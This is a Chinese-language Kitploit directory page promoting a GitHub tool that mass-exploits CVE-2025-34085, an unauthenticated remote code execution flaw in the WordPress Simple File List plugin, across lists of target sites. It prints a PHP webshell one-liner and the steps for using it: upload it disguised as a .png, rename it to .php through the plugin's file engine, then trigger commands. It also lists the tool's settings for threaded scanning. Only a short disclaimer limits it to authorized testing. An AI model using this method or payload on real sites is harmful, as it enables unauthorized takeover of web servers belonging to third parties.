Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-34085-Multi-target — 一个多目标未授权RCE扫描器,针对影响WordPress Simple File List插件的CVE-2025-34085。可在大型目标集上执行文件上传、重命名并触发PHP webshell。 | Kitploit
工具/GitHubGitHub/ill-deed/cve-2025-34085-multi-target
漏洞扫描器Payload生成漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试命令与控制红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHub
ill-deed/cve-2025-34085-multi-target

CVE-2025-34085-Multi-target

一个多目标未授权RCE扫描器,针对影响WordPress Simple File List插件的CVE-2025-34085。可在大型目标集上执行文件上传、重命名并触发PHP webshell。

查看仓库
34321年前Kitploit 审核通过
分享

CVE-2025-34085 多目标 RCE 扫描器

CVE-2025-34085 的大规模利用扫描器 —— 针对 WordPress Simple File List 插件的未认证远程代码执行漏洞。

该工具上传一个伪装成图片的 PHP 载荷,通过易受攻击的文件引擎重命名,并用自定义命令触发 shell 执行。支持多线程扫描大规模目标集。


🔥 功能特性

  • 多目标扫描(从 targets.txt 读取)
  • 自动上传并重命名恶意载荷
  • 可自定义命令的 WebShell 触发
  • 线程化执行以提高速度
  • 成功 RCE 记录到 vuln.txt

⚙️ 使用方法

root@kitploit:~
python3 CVE-2025-34085.py

目标应列在 targets.txt 中:

root@kitploit:~
example.com
http://target2.com
https://target3.com

🛠️ 配置

根据需要编辑脚本中的以下值:

root@kitploit:~
COMMAND = "id"                      # 要执行的 Shell 命令
EXPECTED_SUBSTRING = "uid="        # 用于验证命令执行成功的字符串
THREADS = 20                        # 并发线程数

💡 工作原理

  1. 通过易受攻击的 ee-upload-engine.php 上传一个包含 <?php system($_GET['cmd']); ?> 的假 .png 文件。

  2. 使用 ee-file-engine.php 将其重命名为 .php、.phtml 等。

  3. 发送 GET 请求触发 shell,附带 cmd=id。

  4. 根据预期的输出子字符串验证成功。


📂 输出

成功命中结果保存到:

root@kitploit:~
vuln.txt

每行包含易受攻击的 URL、shell 路径和命令输出。


🧪 测试环境

WordPress Simple File List 插件(受 CVE-2025-34085 影响的未修补版本)

具有可写 wp-content/uploads/ 的 Apache/Nginx 默认配置


⚠️ 免责声明

此工具仅用于教育和授权测试。 使用风险自负。未经授权访问系统是违法的。

下载工具